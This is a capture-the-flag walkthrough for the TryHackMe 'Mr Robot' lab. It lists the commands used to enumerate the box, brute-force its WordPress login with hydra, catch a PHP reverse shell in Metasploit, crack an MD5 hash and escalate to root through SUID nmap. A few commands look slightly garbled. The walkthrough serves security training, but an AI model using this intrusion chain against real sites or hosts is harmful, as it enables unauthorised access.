TryHackMe Mr Robot CTF is based on the Mr. Robot show, can you root this box?

TryHackMe Mr Robot CTF Recon the B0x

nmap -Pn -sC -sV --script=vuln 10.10.171.61

Mr Robot CTF

./gobuster dir -u http://10.10.171.61 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50 -q

wget http://10.10.171.61/robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

wget http://10.10.171.61/key-1-of-3.txt

wget http://10.10.171.61/fsocity.dic

Brute Force WordPress Login

Detect Valid Username

hydra -L /home/kali/Desktop/TryHackMe_Labs/MrRobot_Lab/fsocity.dic -p rfs 10.10.131.16 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Something is incorrect." -V -F -u

Detect Valid Password

hydra -l Elliot -P /home/kali/Desktop/TryHackMe_Labs/MrRobot_Lab/fsocity.dic 10.10.131.16 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=Something is incorrect." -V -F -u

Upload PHP reverse Shell

http://10.10.171.61/wp-login.php

metasploit listeningport 19850

msfconsole

use exploit/multi/handler

set LHOST tun0

set LPORT 19850

run

$ pwd
/home/robot
$ ls
key-2-of-3.txt
password.raw-md5

cat password.raw-md5

robot:c3fcd3d76192e4007dfb496cca-RFS

echo "c3fcd3d76192e4007dfb496cca-RFS" >> robot_passwd_md5.txt

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt robot_passwd_md5.txt

python -c 'import pty; pty; pty.spawn("/bin/bash")'

[email protected]:/home/robot$ su - robot

Insert MD5 password cracked before

$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)

cat /home/robot/key-2-of-3.txt

Privilege Escalation

cat /etc/crontab

sudo -l

Find SUID Binaries

find / -perm +6000 2>/dev/null | grep '/bin/'

/usr/local/bin/nmap --interactive

!sh

cat /root/key-3-of-3.txt

Mr Robot CTF

How to Attack WordPress Website